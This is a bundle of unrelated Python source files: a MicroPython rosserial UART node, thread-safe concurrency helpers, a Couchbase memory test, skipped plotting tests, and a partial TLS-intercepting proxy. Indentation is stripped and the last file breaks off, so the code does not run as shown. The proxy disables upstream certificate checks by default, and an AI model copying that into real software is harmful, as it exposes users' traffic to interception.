if sys.platform == "esp32":
import _thread as threading
else:
import threading
#rosserial protocol header
header=[0xff,0xfe]
#class to manage publish and subscribe
#COULD BE CHANGED AFTERWARDS
class NodeHandle(object):
def __init__(self, serial_id, baudrate):
"""
id: used for topics id (negotiation)
advertised_topics: manage already negotiated topics
subscribing_topics: topics to which will be subscribed are here
serial_id: uart id
baudrate: baudrate used for serial comm
"""
self.id=101
self.advertised_topics=dict()
self.subscribing_topics=dict()
self.serial_id=serial_id
self.baudrate=baudrate
self.uart = m.UART(self.serial_id, self.baudrate)
self.uart.init(self.baudrate, bits=8, parity=None, stop=1, txbuf=0)
if sys.platform == "esp32":
threading.start_new_thread(self._listen, ())
else:
threading.Thread(target = self._listen).start()
#method to manage and advertise topic
#before publishing or subscribing
def _advertise_topic(self, topic_name, msg, endpoint, buffer_size):
"""
topic_name: eg. (Greet)
msg: message object
endpoint: corresponds to TopicInfo.msg typical topic id values
"""
register=TopicInfo()
register.topic_id=self.id
register.topic_name=topic_name
register.message_type=msg._type
register.md5sum=msg._md5sum
self.advertised_topics[topic_name]=self.id
#id are summed by one
self.id+=1
try:
register.buffer_size=buffer_size
except Exception as e:
print('No buffer size could be defined for topic negotiation.')
#serialization
packet=uio.StringIO()
register.serialize(packet)
#already serialized (packet)
packet=list(packet.getvalue().encode('utf-8'))
length=len(packet)
#both checksums
crclen=[checksum(le(length))]
crcpack=[checksum(le(endpoint)+packet)]
#final packet to be sent
fpacket=header+le(length)+crclen+le(endpoint)+packet+crcpack
self.uart.write(bytearray(fpacket))
def publish(self, topic_name, msg, buffer_size=1024):
if topic_name not in self.advertised_topics:
self._advertise_topic(topic_name, msg, 0, buffer_size)
#same as advertise
packet=uio.StringIO()
msg.serialize(packet)
packet=list(packet.getvalue().encode('utf-8'))
length=len(packet)
topic_id=le(self.advertised_topics.get(topic_name))
crclen=[checksum(le(length))]
crcpack=[checksum(topic_id+packet)]
fpacket=header+le(length)+crclen+topic_id+packet+crcpack
self.uart.write(bytearray(fpacket))
def subscribe(self, topic_name, msgobj, cb, buffer_size=1024):
assert cb is not None, "Subscribe callback is not set"
#subscribing topic attributes are added
self.subscribing_topics[self.id]=[msgobj,cb]
#advertised if not already subscribed
if topic_name not in self.advertised_topics:
msg = msgobj()
self._advertise_topic(topic_name, msg, 1, buffer_size)
def _listen(self):
while True:
try:
flag=self.uart.read(2)
#check header
if flag == b'\xff\xfe':
#get bytes length
lengthbyte = self.uart.read(2)
length = word(list(lengthbyte)[0], list(lengthbyte)[1])
lenchk = self.uart.read(1)
#validate length checksum
lenchecksum = sum(list(lengthbyte)) + ord(lenchk)
if lenchecksum % 256 != 255:
raise ValueError('Length checksum is not right!')
topic_id=list(self.uart.read(2))
inid = word(topic_id[0],topic_id[1])
if inid != 0:
msgdata = self.uart.read(length)
chk = self.uart.read(1)
#validate topic plus msg checksum
datachecksum = sum((topic_id)) + sum(list(msgdata)) + ord(chk)
if datachecksum % 256 == 255:
try:
#incoming object msg initialized
msgobj = self.subscribing_topics.get(inid)[0]
except Exception :
print('TX request was made or got message from not available subscribed topic.')
#object sent to callback
callback = self.subscribing_topics.get(inid)[1]
fdata = msgobj()
fdata = fdata.deserialize(msgdata)
callback(fdata)
else:
raise ValueError('Message plus Topic ID Checksum is wrong!')
except Exception as e:
print('No incoming data could be read for subscribes.')
#functions to be used in class
def word(l, h):
"""
Given a low and high bit, converts the number back into a word.
"""
return (h << 8) + l
#checksum method, receives array
def checksum(arr):
return 255-((sum(arr))%256)
#little-endian method
def le(h):
h &= 0xffff
return [h & 0xff, h >> 8]
#example code
if __name__ == "__main__":
from std_msgs import String
from uros import NodeHandle
msg=String()
msg.data= 'HiItsMeMario'
node=NodeHandle(2,115200)
while True:
node.publish('greet',msg)
|
concurrent_helper.py
|
"""
A private module that implements concurrency-friendly versions of
queues, dictionaries and counters.
Author: JMJ
"""
import collections
import logging
import time
import threading
import sched
_NO_DEFAULT = object() # To check if an optional parameter was specified in selected method calls
_logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def trace(*args, **kwargs):
"""simply call debug"""
_logger.debug(*args, **kwargs)
#print(*args, **kwargs)
def tracing():
""" Whether to trace or not"""
return True
def critical(*args, **kwargs):
"""Wrapper to log critical error messages"""
_logger.critical(*args, **kwargs)
class AtomicNumber:
"""Supports various atomic operations on numbers
Adapted by JMJ from https://gist.github.com/benhoyt/8c8a8d62debe8e5aa5340373f9c509c7"""
def __init__(self, initial=0):
"""Initialize a new atomic number to given initial value (default 0)."""
self._value = initial
self._lock = threading.Lock()
def next(self):
"""
Atomically increment the counter and return the new value
>>> counter = AtomicNumber(40)
>>> counter.next()
41
>>> counter.next()
42
"""
with self._lock:
self._value += 1
return self._value
def add(self, addend) -> None:
"""
Atomically add {addend} to the counter. Returns nothing.
>>> counter = AtomicNumber(40)
>>> counter.add(2) # returns nothing
>>> counter.value()
42
"""
with self._lock:
self._value += addend
def __repr__(self):
""" Returns string representation of value"""
return repr(self._value)
def value(self):
"""
Returns a snapshot of the number without attempting
to take the internal lock.
>>> counter = AtomicNumber(42)
>>> counter.value()
42
"""
return self._value
class ConcurrentDeque:
"""
A thread-safe deque. It implements a subset of deque methods.
>>> dq = ConcurrentDeque()
>>> dq.appendleft(42)
>>> print(len(dq))
1
>>> print(dq.pop())
42
>>> dq.append(100)
>>> dq.process_all(lambda x: print(x))
100
>>> print(dq.popleft())
100
>>> dq.clear()
>>> print(len(dq))
0
"""
#
# IMPLEMENTATION NOTE: the lock MUST be held for all the calls below,
# even if the GIL guarantees the calls (like self._deque.append) are themselves
# thread safe. This is because iteration over elements in the deque may not
# be able to deal with modifications done by other threads (deque documentation
# does not say that iteration is thread safe)
#
def __init__(self):
"""Initialize a new empty deque"""
self._deque = collections.deque()
self._lock = threading.Lock()
def append(self, x):
"""Add x to the right side of the deque."""
with self._lock:
return self._deque.append(x)
def appendleft(self, x):
"""Add x to the left side of the deque."""
with self._lock:
return self._deque.appendleft(x)
def clear(self):
"""Remove all elements from the deque leaving it with length 0."""
with self._lock:
return self._deque.clear()
def __len__(self):
"""Returns a snapshot of the dequeue length."""
with self._lock:
return len(self._deque)
def pop(self):
"""Remove and return an element from the right side of the deque.
If no elements are present, raises an IndexError."""
with self._lock:
return self._deque.pop()
def popleft(self):
"""Remove and return an element from the left side of the deque.
If no elements are present, raises an IndexError."""
with self._lock:
return self._deque.popleft()
def process_all(self, func):
"""Applies {func} to a snapshot of all elements.
This is a heavyweight function. It makes a temporary
copy of the entire dqueue with the deque lock held, but it does not
keep the lock held when calling {func} This also means that it is possible
that items may have been removed (or during) the function call, and items
may have been concurrently added that are not processsed."""
with self._lock:
elements = list(self._deque) # Snapshot of entire deque
for x in elements:
func(x)
class ConcurrentDict:
"""A thread-safe dictionary, implementing a subset of dict methods
>>> cd = ConcurrentDict()
>>> cd.set('a', 1)
>>> cd.get('a')
1
>>> cd.set('b', 2)
>>> cd.get('b')
2
>>> len(cd)
2
>>> cd.get('c', 42)
42
>>> cd.process_all(lambda k, y: print(k, y))
a 1
b 2
>>> cd.pop('a')
1
>>> cd.pop('a', 42) # key 'a' is no longer present
42
>>> cd.upsert('b', lambda x: x, 10) # 'b' exists, value is 2
(2, False)
>>> cd.upsert('e', lambda x: x, 10) # 'c' does not exist
(10, True)
>>> cd.remove_instance('e', 11) # shouldn't get deleted
False
>>> cd.get('e')
10
>>> cd.remove_instance('e', 10) # should get deleted
True
>>> cd.get('e') # doesn't exist, so None is returned, which isn't printed
>>> cd.clear()
>>> cd.empty()
True
>>>
"""
#
# IMPLEMENTATION NOTE: the lock MUST be held for all the calls below,
# even if the GIL guarantees the calls (like self._dict.get) are themselves
# thread safe. This is because the dict state must remain unchanged during iteration.
#
def __init__(self):
"""Initialize a new empty deque"""
self._dict = dict()
self._lock = threading.Lock()
def get(self, key, value=None):
"""Return the value for key if key is in the dictionary, else default.
If default is not given, it defaults to None, so that this method never raises a KeyError.
"""
with self._lock:
return self._dict.get(key, value)
def set(self, key, value):
"""Sets the value of key {key} to {value}. The previous value, if any
will be lost. Another option is upsert."""
with self._lock:
self._dict[key] = value
def pop(self, key, default=_NO_DEFAULT):
""" If key is in the dictionary, remove it and return its value,
else return default. If default is not given and key is not in
the dictionary, a KeyError is raised.
"""
with self._lock:
if default is _NO_DEFAULT:
return self._dict.pop(key)
return self._dict.pop(key, default)
def remove_instance(self, key, value) -> bool:
""" Remove ({key}, {value}) the specific instance of {value} is
present, otherwise does nothing. Returns True IFF value was
actually deleted."""
with self._lock:
try:
obj = self._dict[key]
if obj is value:
del self._dict[key]
return True
except KeyError:
pass
return False
def upsert(self, key, valuefunc, *args, **kwargs):
""" Atomically, if there is no value or None associated with {key}, then
call {valuefunc}(*args, **args) to generate and set a new value 'newvalue' and
return tuple (newvalue, True).
If, on the other hand, there was a non None previous value `prevvalue`, return
(`prevvalue`, False). Thus, the return value is a tuple. The first element is the
new or previous value, and the second element is True if the value was created and
False if the value was preexisting. NOTE: {valuefunc} is called WITHOUT the dictionary lock
being held. There is a small chance that {valuefunc} may be called but the resultant
object discarded. There is also the chance that the previous or newly set value
may be deleted concurrently by another thread before upsert returns.
"""
# Note that if the previous value is None it will be replaced.
# The new value also may potentially be None - if {valuefunc} returns None.
# We don't examine the value returned by {valuefunc}
curvalue = self.get(key) # default is None
created = False
if curvalue is None:
newvalue = valuefunc(*args, **kwargs)
with self._lock:
curvalue = self._dict.get(key)
if curvalue is None:
created = True
curvalue = self._dict[key] = newvalue
# (else we discard newvalue)
return (curvalue, created)
def clear(self):
"""Remove all elements from the dictionary."""
with self._lock:
return self._dict.clear()
def empty(self) -> bool:
"""Returns True if the dictionary is empty at this instant, False otherwise."""
with self._lock:
return not self._dict
def __len__(self):
"""Returns a snapshot of the number of items in the dictionary."""
with self._lock:
return len(self._dict)
def process_all(self, func):
"""Applies {func}(key, value) to a snapshot of all elements.
This is a heavyweight function. It makes a temporary
copy of the entire dqueue with the deque lock held, but it does not
keep the lock held when calling {func}. This also means that it is possible
that items may have been removed (or during) the function call, and items
may have been concurrently added that are not processed.."""
with self._lock:
keys = list(self._dict) # Snapshot of all keys
for key in keys:
val = self._dict.get(key)
if val is not None:
func(key, val)
class EventScheduler:
"""
Each instance manages events scheduled on a single background thread.
>>> scheduler = EventScheduler()
>>> scheduler.start()
>>> x = False
>>> def myevent(): global x; x = True
>>> scheduler.schedule(0.1, myevent)
>>> scheduler.stop(block=True)
>>> print(x)
True
"""
#
# IMPLEMENTATION NOTE: To keep the background thread active - i.e., re-running
# self._scheduler.run(), various calls that the client calls all signal
# self._event (threading.Event, not to be confused with client events!).
# Lock self._lock is used to atomically check/set the value
# of self._quit, self._event and relevant self._scheduler calls. The
# sequence of signalling the threading event in relation to various
# other calls is quite important. This ensures that:
# (a) a scheduled client event will always be serviced 'immediately' by the
# background thread.
# (b) No client events can sneak in concurrently with `cancel_all` being
# called and risk remaining scheduled in the queue.
# (c) The background thread will always exit 'immediately' after 'cancel_all'
# is called and will not be left waiting in some corner case.
#
def __init__(self):
"""Initialize an EventScheduler."""
self._scheduler = sched.scheduler()
self._lock = threading.Lock()
self._event = threading.Event()
self._cancelevent = threading.Event()
self._event_exception = False
self._thread = None
self._quit = False
def start(self):
"""Starts the scheduler. It starts a background thread in which context
the scheduling is done"""
def threadfn():
done = False
while not done:
try:
prequit = self._quit
delay = self._scheduler.run(blocking=False)
if delay:
# Next event in queue happens in {delay} seconds
if self._cancelevent.wait(delay):
trace("threadfn: CANCELING")
done = True # we are done - abandon the rest
else:
# Nothing in queue
if prequit:
# All done
trace("threadfn: NORMAL EXIT")
done = True
else:
# Queue is empty, let's wait for more
self._event.wait() # wait for more events...
self._event.clear()
except Exception: # pylint: disable=broad-except
self._event_exception = True
# This would log an ERROR message with details about the exception.
# By default this prints to stderr, so we get to reports of this error
_logger.exception("EventScheduler: Client's threadfn threw exception")
break # Get out of the loop
trace("Exiting threadfn")
with self._lock:
if self._thread:
raise ValueError("Scheduler seems already started")
else:
self._thread = threading.Thread(target=threadfn)
self._thread.daemon = True
self._thread.start()
def schedule(self, delay, func) -> None:
"""Schedule event {func} to run after waiting {delay} from the point this
call was made OR the scheduler was started, whichever happened later."""
with self._lock:
if self._thread and not self._quit and not self._event_exception:
self._scheduler.enter(delay, priority=0, action=func) # will not block
self._event.set() # wake up background thread if necessary
else:
raise ValueError("Cannot schedule event in current state")
def cancel_all(self):
"""Cancel any pending and future events"""
trace("cancel_all: enter")
self._quit = True
self._event.set() # wake up background thread if necessary
self._cancelevent.set() # get out of scheduler.run() if necessary
trace("cancel_all: exit")
def stop(self, block=False):
"""Stop running once all pending events have been scheduled. If {block}
then block until all events are completed. Once stopped, the scheduler
cannot be restarted."""
trace("stop: entered")
with self._lock: # we don't NEED to lock, but locking anyway
self._quit = True
self._event.set() # wake up background thread if necessary
if block and self._thread:
trace("stop: waiting for thread to complete")
# This works even if the thread has exited prematurely
self._thread.join()
trace("stop:thread completed")
def healthy(self) -> bool:
""" Returns if the scheduler is stopped or running OK. If
a client event handler threw an exception it returns True."""
return not self._event_exception
class ConcurrentInvoker:
"""For invoking a function in a different context and logging errors.
Invocation is supressed if an earlier error occurred. A list of exceptions is
available in self.exceptions (up to about MAX_EXCEPTIONS)"""
# (Approximate) max exceptions to save in self.exceptions. It is
# technically approximate because of concurrent execution
MAX_EXCEPTIONS = 5
def __init__(self, executor, logger=None):
"""Initialize the invoker"""
self._executor = executor
self._logger = logger
self.exceptions = []
def invoke(self, func, *args, **kwargs) -> None:
"""Invoke {func(*args, **kwargs)} in a different execution context.
Invocation is suppressed if an earlier exception occurred. If an
exception is raised by invoking {func}, the exception may be
added to list {self.exceptions} and future invocations will be supressed."""
self.tagged_invoke(None, func, *args, **kwargs)
def tagged_invoke(self, tag, func, *args, **kwargs) -> None:
"""Same as invoke, with the addition that {tag} is logged to help
distinguish one invocation of {func} from another."""
prefix = str(tag)+ ', ' if tag else ''
def rootfunc():
if self.exceptions:
if self._logger:
msg = "invocation(%s%s): SUPPRESSED because of earlier exception"
self._logger.error(msg, prefix, func.__name__)
return
try:
func(*args, **kwargs)
except Exception as exp:
if len(self.exceptions) < ConcurrentInvoker.MAX_EXCEPTIONS:
self.exceptions.append(exp)
if self._logger:
self._logger.error("Invocation(%s%s) raised exception",
prefix, func.__name__, exc_info=True)
raise exp
self._executor.submit(rootfunc)
class CountDownLatch():
"""Emulation of Java's CountDownLatch.
>>> latch = CountDownLatch(2)
>>> latch.wait(0.01) # Haven't counted down to 0; should timeout.
False
>>> latch.count_down()
>>> latch.wait(0.01) # Haven't counted down to 0; should timeout.
False
>>> latch.count_down()
>>> latch.wait(0.01) # We've counted down to 0; should succeed
True
>>> latch.wait() # We've counted down to 0; should succeed
True
"""
def __init__(self, count):
"""Initializes the latch with the specified count"""
self.count = count
self.cond = threading.Condition()
def count_down(self) -> None:
"""Counts down by 1. Count MUST be greater than 1 else
a ValueError exception is thrown"""
with self.cond:
if self.count < 1:
raise ValueError("Attempt to count down below 0")
self.count -= 1
if self.count <= 0:
self.cond.notifyAll()
def wait(self, timeout=None) -> bool:
"""Waits until the count goes to zero, or until the timeout expires.
If {timeout} is None, there is no timeout.
Return value: True unless timeout expired, in which case it returns False.
Note: timer resolution is time.time(), but also based on thread scheduling
latencies.
"""
if timeout is None:
# simple case of infinite timeout
with self.cond:
while self.count > 0:
self.cond.wait()
return True # -------- EARLY RETURN --------
timeleft = timeout
timed_out = False
with self.cond:
# {{Inv: timeout not hit and count > 0}}
start = time.time()
while not timed_out and self.count > 0:
signalled = self.cond.wait(timeleft)
if signalled:
if self.count > 0:
# Oops - we were signaled, but the
# count is still not 0. We'll have to
# try again. Update time left
delta = time.time() - start
timeleft = timeout - delta
timed_out = timeleft <= 0
else:
# We timed out.
timed_out = True
return not timed_out
if __name__ == '__main__':
import doctest
doctest.testmod()
|
dgm.py
|
from threading import Thread
from BucketLib.BucketOperations import BucketHelper
from basetestcase import ClusterSetup
from cb_tools.cbstats import Cbstats
from couchbase_helper.documentgenerator import doc_generator
from remote.remote_util import RemoteMachineShellConnection
from table_view import TableView
class Bucket_DGM_Tests(ClusterSetup):
def setUp(self):
super(Bucket_DGM_Tests, self).setUp()
self.create_bucket()
self.cluster_util.print_cluster_stats()
doc_create = doc_generator(
self.key, 0, self.num_items,
key_size=self.key_size, doc_size=self.doc_size,
doc_type=self.doc_type, vbuckets=self.cluster_util.vbuckets)
for bucket in self.bucket_util.buckets:
task = self.task.async_load_gen_docs(
self.cluster, bucket, doc_create, "create", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10,
process_concurrency=8)
self.task.jython_task_manager.get_task_result(task)
# Verify initial doc load count
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
self.log.info("========= Finished Bucket_DGM_Tests setup =======")
def tearDown(self):
super(Bucket_DGM_Tests, self).tearDown()
def test_dgm_to_non_dgm(self):
# Prepare DGM scenario
bucket = self.bucket_util.get_all_buckets()[0]
dgm_gen = doc_generator(
self.key, self.num_items, self.num_items+1)
dgm_task = self.task.async_load_gen_docs(
self.cluster, bucket, dgm_gen, "create", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10,
process_concurrency=4,
active_resident_threshold=self.active_resident_threshold)
self.task_manager.get_task_result(dgm_task)
num_items = dgm_task.doc_index
gen_create = doc_generator(self.key, num_items,
num_items+self.num_items,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type,
vbuckets=self.cluster_util.vbuckets)
gen_update = doc_generator(self.key, 0, self.num_items,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type,
vbuckets=self.cluster_util.vbuckets)
gen_delete = doc_generator(self.key, self.num_items, num_items,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type,
vbuckets=self.cluster_util.vbuckets)
# Perform continuous updates while bucket moves from DGM->non-DGM state
if not self.atomicity:
tasks = list()
tasks.append(self.task.async_load_gen_docs(
self.cluster, bucket, gen_update, "update", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10, process_concurrency=2))
tasks.append(self.task.async_load_gen_docs(
self.cluster, bucket, gen_delete, "delete", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
batch_size=10, process_concurrency=2,
timeout_secs=self.sdk_timeout,
skip_read_on_error=True))
tasks.append(self.task.async_load_gen_docs(
self.cluster, bucket, gen_create, "create", 0,
persist_to=self.persist_to, replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
batch_size=10, process_concurrency=2))
for task in tasks:
self.task.jython_task_manager.get_task_result(task)
else:
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets, gen_create,
"create", 0, batch_size=20,
process_concurrency=8,
replicate_to=self.replicate_to,
persist_to=self.persist_to,
timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync)
self.task.jython_task_manager.get_task_result(task)
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets, gen_create,
"update", 0, batch_size=20,
process_concurrency=8,
replicate_to=self.replicate_to,
persist_to=self.persist_to,
timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
update_count=self.update_count,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync)
self.task.jython_task_manager.get_task_result(task)
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets, gen_delete,
"rebalance_delete", 0, batch_size=20,
process_concurrency=8,
replicate_to=self.replicate_to,
persist_to=self.persist_to,
timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync)
self.task.jython_task_manager.get_task_result(task)
def test_MB_40531(self):
"""
Test to validate,
1. Active resident ratio on the nodes never goes
down below the replica_rr value
2. 'evictable' (vb_replica_itm_mem - vb_replica_meta_data_mem) value
never goes below wm_threshold of total bucket memory (ep_max_size)
:return:
"""
def check_replica_eviction():
tbl = TableView(self.log.info)
tbl.set_headers(["Node", "Memory", "WM_Threshold",
"Itm_mem", "Meta_mem", "Evictable_mem",
"A_rr", "R_rr"])
while self.test_failure is None and run_eviction_check:
tbl.rows = []
for kv_node in node_data.keys():
all_stats = \
node_data[kv_node]["cbstat"].all_stats(bucket.name)
bucket_mem = int(all_stats["ep_max_size"])
wm_threshold = \
(float(all_stats["ep_mem_high_wat_percent"])
- float(all_stats["ep_mem_low_wat_percent"]))*100
evictable_mem = \
int(all_stats["vb_replica_itm_memory"]) \
- int(all_stats["vb_replica_meta_data_memory"])
active_rr = int(all_stats["vb_active_perc_mem_resident"])
replica_rr = int(all_stats["vb_replica_perc_mem_resident"])
tbl.add_row([kv_node.ip, str(bucket_mem),
str(wm_threshold),
all_stats["vb_replica_itm_memory"],
all_stats["vb_replica_meta_data_memory"],
str(evictable_mem),
str(active_rr), str(replica_rr)])
if active_rr != 100 \
and evictable_mem > (bucket_mem/wm_threshold):
tbl.display("Node memory stats")
self.log_failure("%s - Active keys evicted before "
"meeting the threshold: %s"
% (kv_node.ip, all_stats))
if replica_rr > active_rr:
tbl.display("Node memory stats")
self.log_failure("%s: (active_rr) %s < %s (replica_rr)"
% (kv_node.ip, active_rr, replica_rr))
bucket = self.bucket_util.buckets[0]
node_data = dict()
kv_nodes = self.cluster_util.get_kv_nodes()
for node in kv_nodes:
cbstat = Cbstats(RemoteMachineShellConnection(node))
node_data[node] = dict()
node_data[node]["cbstat"] = cbstat
node_data[node]["active"] = cbstat.vbucket_list(bucket.name,
"active")
node_data[node]["replica"] = cbstat.vbucket_list(bucket.name,
"replica")
target_dgm = 30
run_eviction_check = True
bucket_helper = BucketHelper(self.cluster.master)
eviction_check_thread = Thread(target=check_replica_eviction)
eviction_check_thread.start()
op_index = 0
op_batch_size = 8000
create_batch_size = 10000
# Perform ADD/SET/READ until targeted DGM value is reached
curr_dgm = bucket_helper.fetch_bucket_stats(bucket.name)[
"op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Wait for DGM to reach %s%%. Current DGM: %s%%"
% (target_dgm, curr_dgm))
while int(curr_dgm) > target_dgm and self.test_failure is None:
create_gen = doc_generator(
self.key, self.num_items, self.num_items+create_batch_size,
key_size=self.key_size, doc_size=self.doc_size,
mutation_type="ADD")
update_gen = doc_generator(
self.key, op_index, op_index+op_batch_size,
key_size=self.key_size, doc_size=self.doc_size,
mutation_type="ADD")
read_gen = doc_generator(
self.key, op_index, op_index+op_batch_size,
key_size=self.key_size, doc_size=0)
create_task = self.task.async_load_gen_docs(
self.cluster, bucket, create_gen, "create", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
print_ops_rate=False,
batch_size=200,
process_concurrency=1)
update_task = self.task.async_load_gen_docs(
self.cluster, bucket, update_gen, "update", 0,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability_level,
timeout_secs=self.sdk_timeout,
print_ops_rate=False,
batch_size=200,
process_concurrency=1)
read_task = self.task.async_load_gen_docs(
self.cluster, bucket, read_gen, "read",
timeout_secs=self.sdk_timeout,
print_ops_rate=False,
batch_size=200,
process_concurrency=1)
self.task_manager.get_task_result(create_task)
self.task_manager.get_task_result(update_task)
self.task_manager.get_task_result(read_task)
# Update indexes for next iteration
op_index += op_batch_size
self.num_items += create_batch_size
curr_dgm = bucket_helper.fetch_bucket_stats(bucket.name)[
"op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Current DGM: %s%%" % curr_dgm)
# Stop eviction check thread
run_eviction_check = False
eviction_check_thread.join()
# Close shell connections
for node in kv_nodes:
node_data[node]["cbstat"].shellConn.disconnect()
self.validate_test_failure()
|
test_blitter.py
|
#%%
#%load_ext autoreload
#%autoreload 2
import multiprocessing as mp
import numpy as np
import os
import sys
import pytest
from time import sleep
from types import SimpleNamespace as SN
from utils.memory_tracker.blitter import Blitter
#%%
refresh = 3
history = 12
dataEvents = 1000
history / refresh
def reader(queues):
for val in np.random.rand(dataEvents):
queues.graph.put(val)
if round(np.random.rand()-.25) == 1:
queues.event.put('R')
sleep(refresh)
def writer(queues):
for val in np.random.rand(dataEvents):
queues.graph.put(val)
if round(np.random.rand()-.25) == 1:
queues.event.put('W')
sleep(refresh)
@pytest.mark.skip
def test_plotter():
pltt = Blitter(refresh=refresh, history=history)
print('Getting queues')
readQ = pltt.get_queues('reader')
writeQ = pltt.get_queues('writer')
print('Starting')
#plttProc = mp.Process(target=pltt.start)
readProc = mp.Process(target=reader, args=(readQ, ))
writProc = mp.Process(target=writer, args=(writeQ, ))
#plttProc.start()
readProc.start()
writProc.start()
pltt.start()
#sleep(5)
#print('Pausing')
#pltt.pause()
#sleep(10)
#print('Resuming')
#pltt.resume()
#sleep(5)
print('Joining')
readProc.join()
writProc.join()
#pltt.pause()
#input('Press any key to exit\n')
pltt.stop()
#plttProc.terminate()
print('Exiting')
@pytest.mark.skip
def test_watcher():
pltt = Blitter(refresh=refresh, history=history)
print('Getting queues')
readQ = pltt.get_queues('reader')
writQ = pltt.get_queues('writer')
totaQ = pltt.get_queues('total')
trash = SN(graph=mp.Queue(), event=mp.Queue())
readProc = mp.Process(target=reader, args=(trash, ))
writProc = mp.Process(target=writer, args=(trash, ))
print('Starting reader and writer')
readProc.start()
writProc.start()
print('Starting watcher')
procs = {
'reader': {'pid': readProc.pid, 'queue': readQ.graph},
'writer': {'pid': writProc.pid, 'queue': writQ.graph},
'total' : {'queue': totaQ.graph}
}
watcher(procs, refresh=refresh)
print('Starting Blitter')
pltt.start()
print('Joining reader and writer')
readProc.join()
writProc.join()
#pltt.pause()
#input('Press any key to exit')
pltt.stop()
print('Exiting')
@pytest.mark.skip
#@watch(name='script', plotter={'refresh': refresh, 'history': history})
def test_decorator():
data = np.array()
for i in range(dataEvents):
data = np.concat(data, np.random.rand(int(np.random.rand()*1e5)))
if round(np.random.rand()-.5) == 1:
del(data)
data = np.array()
|
proxy2.py
|
# -*- coding: utf-8 -*-
#
#
# This code originated from the project https://github.com/inaz2/proxy2 but has since
# been modified extensively.
#
#
import base64
import re
import socket
import ssl
import threading
import urllib.parse
from http.client import HTTPConnection, HTTPSConnection
from http.server import BaseHTTPRequestHandler
from . import cert, socks
class ProxyRequestHandler(BaseHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
# Path to the directory used to store the generated certificates.
# Subclasses can override certdir
certdir = cert.CERTDIR
def __init__(self, *args, **kwargs):
self.tls = threading.local()
self.tls.conns = {}
self.websocket = False
super().__init__(*args, **kwargs)
def do_CONNECT(self):
self.send_response(200, 'Connection Established')
self.end_headers()
certpath = cert.generate(self.path.split(':')[0], self.certdir)
with ssl.wrap_socket(self.connection,
keyfile=cert.CERTKEY,
certfile=certpath,
server_side=True) as conn:
self.connection = conn
self.rfile = conn.makefile('rb', self.rbufsize)
self.wfile = conn.makefile('wb', self.wbufsize)
conntype = self.headers.get('Proxy-Connection', '')
if self.protocol_version == 'HTTP/1.1' and conntype.lower() != 'close':
self.close_connection = False
else:
self.close_connection = True
def proxy_request(self):
req = self
content_length = int(req.headers.get('Content-Length', 0))
req_body = self.rfile.read(content_length) if content_length else None
if req.path[0] == '/':
path = '{}{}'.format(req.headers['Host'], req.path)
if isinstance(self.connection, ssl.SSLSocket):
req.path = 'https://{}'.format(path)
else:
req.path = 'http://{}'.format(path)
req_body_modified = self.handle_request(req, req_body)
if req_body_modified is False:
# Response already committed
return
elif req_body_modified is not None:
req_body = req_body_modified
del req.headers['Content-length']
req.headers['Content-length'] = str(len(req_body))
u = urllib.parse.urlsplit(req.path)
scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path)
assert scheme in ('http', 'https', 'about')
if netloc:
req.headers['Host'] = netloc
setattr(req, 'headers', self._filter_headers(req.headers))
try:
conn = self._create_connection((scheme, netloc))
conn.request(self.command, path, req_body, dict(req.headers))
res = conn.getresponse()
if res.headers.get('Upgrade') == 'websocket':
self.websocket = True
version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'}
setattr(res, 'headers', res.msg)
setattr(res, 'response_version', version_table[res.version])
res_body = res.read()
except Exception:
msg = 'Error making request to: %s'
if self.server.options.get('suppress_connection_errors', True):
self.log_message(msg, req.path)
else:
self.log_error(msg, req.path)
self.close_connection = True
return
res_body_modified = self.handle_response(req, req_body, res, res_body)
if res_body_modified is False:
self.send_error(403)
return
elif res_body_modified is not None:
res_body = res_body_modified
del res.headers['Content-length']
res.headers['Content-Length'] = str(len(res_body))
setattr(res, 'headers', self._filter_headers(res.headers))
self.commit_response(
res.status,
res.reason,
res.headers,
res_body,
conn
)
def _create_connection(self, origin):
scheme, netloc = origin
if origin not in self.tls.conns:
proxy_config = self.server.proxy_config
kwargs = {
'timeout': self.timeout
}
if scheme == 'https':
connection = ProxyAwareHTTPSConnection
if not self.server.options.get('verify_ssl', False):
kwargs['context'] = ssl._create_unverified_context()
else:
connection = ProxyAwareHTTPConnection
self.tls.conns[origin] = connection(proxy_config, netloc, **kwargs)
return self.tls.conns[origin]
do_HEAD = proxy_request
do_POST = proxy_request
do_GET = proxy_request
do_PUT = proxy_request
do_DELETE = proxy_request
do_OPTIONS = proxy_request
do_PATCH = proxy_request
def _filter_headers(self, headers):
